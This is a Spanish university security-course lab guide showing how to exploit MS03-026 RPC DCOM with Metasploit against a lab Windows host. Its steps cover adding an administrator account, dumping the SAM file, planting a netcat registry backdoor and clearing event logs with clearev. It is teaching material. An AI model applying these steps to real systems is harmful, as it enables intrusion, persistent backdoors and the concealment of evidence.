Вы находитесь на странице: 1из 14

[1]

PROCEDIMIENTO:
1. Identificacin de vulnerabilidades para explotacin
o Con la IP 192.168.3.38 (Equipo de Windows 2000)
2. Id de vulnerabilidades del sistema
3. Buscar el exploit para explotar vulnerabilidades (Metasploit)
4. Explotar vulnerabilidades (abrir un shell y crear una cuenta de usuario)
1. Se ocup la siguiente exploit que explota la vulnerabilidad de Desbordamiento de
Interface Microsoft RPC DCOM
Este mdulo explota un stack buffer overflow en el servicio de RPCSS, esta vulnerabilidad
es originalmente encontrada por el ltimos estado de etapa del grupo de investigacin
Delirium y ha sido ampliamente explotado desde entonces. En este mdulo se pueden
aprovechar las versiones en Ingls de Windows NT 4.0 Service Pack 3-6a, Windows 2000,
Windows XP y Windows 2003 en un solo pedido.
Objetivos
Windows NT SP3-6a/2000/XP/2003 universal (por defecto)
Informacin de uso
Desbordamiento de bfer en interfaz de una cierta DCOM RPC de Microsoft para Windows NT
4.0, 2000, XP y Server 2003 permite a atacantes remotos ejecutar cdigo arbitrario mediante
un mensaje con formato incorrecto, tan explotado por el Blaster / Msblast / LovSan y Nachi /
Welchia gusanos
Primer Paso:
Iniciar el Metasploit Framework
De acuerdo con las Polticas de Servicios de Redes de Kali Linux, no hay servicios de red, as
como servicios de base de datos en el arranque, por lo que hay un par de pasos que deben
tomarse en cuenta para la ejecucin Metasploit y el soporte a la base de datos.

SEGURIDAD INFORMATICA - EPIS - UNPRG

ING. ROBERT E. PUICAN GUTIERREZ

[2]
Inicie el servicio de PostgreSQL de Kali Linux
Metasploit usa PostgreSQL como su base de datos por lo que necesita ser iniciado
previamente.
service postgresql start

Inicie el servicio de Metasploit en Kali Linux


Con PostgreSQL en marcha, el prximo paso es ejecutar el servicio Metasploit. La primera vez
que se ejecute el servicio, se crear un usuario de base de datos msf3 y una base de datos
llamada msf3. El servicio tambin ejecutar los servidores RPC y web requeridos.
service metasploit start

Inicie msfconsole en Kali


Una vez iniciado los servicios de PostgreSQL y Metasploit, puede iniciar msfconsole y verificar
la conectividad de la base de datos con el siguiente comando: db_status
msfconsole

SEGURIDAD INFORMATICA - EPIS - UNPRG

ING. ROBERT E. PUICAN GUTIERREZ

[3]
msf > db_status
[*] postgresql connected to msf3
msf >

Configure Metasploit para ejecutar al inicio


Si usted prefiere que PostgreSQL y Metasploit se ejecuten al inicio, puede usar update-rc.d
para habilitar los servicios como se muestra a continuacin:
update-rc.d postgresql enable
update-rc.d metasploit enable

Primer Paso
Desde el Kali Linux
En la consola de Metasploit ejecute el comando, para buscar un exploit:
search ms03_026

SEGURIDAD INFORMATICA - EPIS - UNPRG

ING. ROBERT E. PUICAN GUTIERREZ

[4]

Luego para usar el exploit ejecute:


use exploit/windows/dcerpc/ms03_026_dcom

Para mostrar las opciones que tiene este exploit podemos usar
show options

SEGURIDAD INFORMATICA - EPIS - UNPRG

ING. ROBERT E. PUICAN GUTIERREZ

[5]

Configuramos el parmetro de RHOST, que es la direccin del host remoto (Windows)


set RHOST 192.168.1.38

Para mostrar los payloads disponible para este exploit:


show payloads

SEGURIDAD INFORMATICA - EPIS - UNPRG

ING. ROBERT E. PUICAN GUTIERREZ

[6]

Configuramos el payload a ejecutar, en nuestro caso deseamos obtener una Shell remota.
set PAYLOAD generic/shell_bind_tcp

En el caso de que hubieran ms de un posible objetivo podemos verificar con:


show targets

Podemos configurar con:


set target 0

SEGURIDAD INFORMATICA - EPIS - UNPRG

ING. ROBERT E. PUICAN GUTIERREZ

[7]

Finalmente ejecutamos el exploit


exploit

Dentro del sistema ejecute comandos bsicos de msdos:

Visualizamos los usuarios con que cuenta el sistema:

SEGURIDAD INFORMATICA - EPIS - UNPRG

ING. ROBERT E. PUICAN GUTIERREZ

[8]

Posteriormente ejecute el siguiente comando para crear un usuario y contrasea dentro del
equipo.

Verificar usuarios administradores

Elevar los privilegios del usuario creado (adrian)

SEGURIDAD INFORMATICA - EPIS - UNPRG

ING. ROBERT E. PUICAN GUTIERREZ

[9]

Run getgui u <usuario> -p <password>

USANDO METERPRETER

SEGURIDAD INFORMATICA - EPIS - UNPRG

ING. ROBERT E. PUICAN GUTIERREZ

[10]

Metasploit & Metepreter (Diversion garantizada)


Metasploit es un framework que nos proporciona mltiples exploit y herramientas que nos
permiten identificar vulnerabilidades en una prueba de penetracin de sistemas.

Recuerdo cuando no existia este framework y tenias que descargar cada exploit , modificarlo y
compilarlo por lo general todos estaban escritos C, como olvidar el exploit de tarasco que
explotaba una vulnerabilidad conocida en los sistemas Windows "RPC DCOM" mi primera shell
reversa con windows XP fue amor a primera vista .

Comenzamos determinando el S.O , los servicios y versiones de software con el que cuenta
nuestro objetivo (Target).

Determinamos que nuestro objetivo es un w2k3 sin parche alguno , ejecutamos


metasploit buscamo el exploit para nuestro w2k3 , configuramos el ms03_026_dcom , en
nuestro caso vamos a utilizar como payload a meterpreter y una shell reversa por si hay algn
firewall "protegiendo" el S.O

SEGURIDAD INFORMATICA - EPIS - UNPRG

ING. ROBERT E. PUICAN GUTIERREZ

[11]

En la imagen podemos observar que metepreter creo una sesin de forma exitosa, ahora
podemos hacer lo que nuestra imaginacin nos permita , el comando sysinfo permite obtener
datos del S.O.

Con el comando Shell nos devuelve una "shell" del S.O , con la cual podemos utilizar los
comandos nativos de Windows , como por ejemplo listar la configuracin de las IP

SEGURIDAD INFORMATICA - EPIS - UNPRG

ING. ROBERT E. PUICAN GUTIERREZ

[12]

Listamos los procesos del sistema operativo con el comando Tasklist

Para volver a la sesin de meterpreter solo escribimos exit, con el comando screenshot
capturamos la pantalla actual del servidor
SEGURIDAD INFORMATICA - EPIS - UNPRG

ING. ROBERT E. PUICAN GUTIERREZ

[13]

Metepreter nos permite hacer un dump al archivo SAM de windows , para posteriormente
crackear, con el comando upload subimos un Netcat al equipo y modificamos el editor de
registros de windows para crear una BindShell.

Modificamos "regedit"

Ya tenemos una puerta trasera escuchando en un puerto en este caso el 666 jajaaj,
meterpreter permite aplicar tcnicas "anti forenses" como el de limpiar el registro de eventos
de windows para no "dejar" huellas con el comando clearev.

SEGURIDAD INFORMATICA - EPIS - UNPRG

ING. ROBERT E. PUICAN GUTIERREZ

[14]

Mientras menos rastros se pueda dejar en una intrusin mejor , el nivel de experiencia de un
buen pentester es proporcional a las huellas que pueda dejar en una intrusin.

SEGURIDAD INFORMATICA - EPIS - UNPRG

ING. ROBERT E. PUICAN GUTIERREZ

Вам также может понравиться